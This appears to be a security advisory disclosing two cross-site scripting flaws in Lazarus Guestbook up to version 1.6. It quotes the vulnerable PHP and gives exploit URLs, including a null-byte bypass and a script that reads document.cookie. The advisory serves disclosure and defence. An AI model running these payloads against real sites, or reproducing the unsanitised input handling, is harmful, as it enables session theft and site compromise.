Lazarus Guestbook Cross Site Scripting Vulnerabilities
Produce : Lazarus Guestbook
Website : http://carbonize.co.uk/Lazarus/
Version : <= 1.6
Problem : Cross Site Scripting
1)
The first probleme is in codes-english.php ,"show" parameter in
lang/codes-english.php isn't properly sanitised
This can be exploited to execute arbitrary HTML and javascript code
Vulnerable code in lang/codes-english.php near line 4
1 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
2 <html>
3 <head>
4 <title><?php echo($_GET['show']); ?></title>
Exploit :
http://localhost/lazarusgb/lang/codes-english.php?show=%3C/title%3E[XSS]
http://localhost/lazarusgb/lang/codes-english.php?show=%3C/title%3E<script>alert(document.cookie);</script>
2)
the seconde probleme is in picture.php , the script verifiy fist if image file
exists
after it display it ,
vulnerable code : in picture.php
********************************
24 if (!empty($_GET['img'])) {
26 if (file_exists("$GB_TMP/$_GET[img]")) {
27 $size = @GetImageSize("$GB_TMP/$_GET[img]");
28 $picture = "$GB_PG[base_url]/$GB_TMP/$_GET[img]";
29 }
.. ............
49 <td align="center" valign="middle">
50 <?php
51 if (!empty($_GET['img']) && is_array($size)) {
52 echo "<a href=\"javascript:window.close()\"><img src=\"$picture\"
width=\"$size[0]\" height=\"$size[1]\" border=\"0\"></a>\n";
53 }
54 ?>
55 </td>
****************
if magic_quote_gpc = OFF we can bypass this protection by specifing
existing image file ( Exemple : "img/home.gif") and using a nullchar ( %00 )
POC : http://localhost/lazarusgb/picture.php?img=../img/home.gif%00[code]
file_exists("$GB_TMP/$_GET[img]") will return true and html code will be
executed
Exploit:
http://localhost/lazarusgb/picture.php?img=../img/home.gif%00%22%3E[XSS]
http://localhost/lazarusgb/picture.php?img=../img/home.gif%00%22%3E<script>alert(document.cookie);</script>
Contact : simo64[at]gmail[dot]com
Moroccan Security Research Team